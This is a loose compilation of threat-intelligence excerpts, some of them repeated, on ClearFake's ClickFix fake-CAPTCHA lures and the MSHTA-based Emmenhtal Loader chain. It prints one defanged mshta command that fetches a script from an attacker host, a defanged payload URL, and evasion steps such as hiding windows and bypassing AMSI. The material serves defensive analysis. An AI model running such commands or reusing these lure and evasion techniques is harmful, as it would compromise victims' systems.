Emmenhtal Loader

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique.

In some cases, MSHTA pulls a script from an attacker-controlled server, while in others it sits inside a longer chain involving phishing, fake software downloads, and ClickFix-style social engineering tricks.

ClearFake adopted the new social engineering tactic ClickFix, displaying fake error messages in the web browser and deceiving users into copying and executing a given malicious PowerShell code... This latest variant uses fake reCAPTCHA or Cloudflare Turnstile verifications, along with fake technical issues, to trick users into resolving these CAPTCHA challenges and finally executing malicious PowerShell code.

Attackers send phishing messages on Discord linking to fake verification pages disguised as reCAPTCHA systems.

Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts that quietly launch the attack in the background.

deceiving users into copying and executing a given malicious PowerShell code... Once executed, the PowerShell command infected the user’s system.

HTA files can embed JavaScript and VBScript code, allowing script execution in the context of a trusted, signed process.

The infection starts when a victim downloads what appears to be free or cracked software... When a user visits one of these pages, JavaScript secretly copies a malicious command to the clipboard and instructs them to press Win + R, paste it, and hit Enter.

The user is then lured into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command.

The user is then misled into following steps to proceed with verification. The instructions involve opening the Run command window using the shortcut Win+R, copying and pasting a command, and executing it.

the ClearFake operator stored an obfuscated JavaScript, encoded in base64 and converted in hexadecimal, within a smart contract’s Application Binary Interface... These obfuscated PowerShell commands execute Mshta.exe... PowerShell script 3 employs multiple obfuscation techniques: XOR obfuscation, Use of arithmetic expressions, Character conversion, Use of random variable names.

The victim executes a Setup.exe file, which is in fact a legitimate Python interpreter... The same directory also contains a renamed MSHTA executable, iso2022.exe.

the returned value of the functions of the ABI are strings that are compressed with the gzip algorithm and base64 encoded... atob to decode the base64 then pako.gunzip to decompress... Download the AES key from the contract... decrypt it with the AES-GCM algorithm.

These obfuscated PowerShell commands execute Mshta.exe with a script hosted on a remote server... The script is the initial stage of Emmenhtal Loader... The ClickFix lure deceived users to execute the following MSHTA command: mshta hxxps://microsoft-dns-reload-1r.pages[.]dev

First, it sets the MSHTA window to 1x1 pixels, starts it minimized, and hides it from the taskbar to evade detection.

Based on Bitdefender's analysis, MSHTA is used as an intermediary step in multi-stage PowerShell attacks before the retrieval of malicious payloads is complete, with attackers executing scripts directly in memory to evade security controls.

When a user visits one of these pages, JavaScript secretly copies a malicious command to the clipboard and instructs them to press Win + R, paste it, and hit Enter.

This script downloads malicious code located at hxxps://ty.klipxytozyi[.]shop/kangarooing.bmp... The PowerShell command downloads and executes another PowerShell script from GitHub... This second PowerShell script proceeds to download and execute an executable from GitHub.

The final, deobfuscated version of the PowerShell script consists of two parts. The first one is an AMSI bypass by patching clr.dll...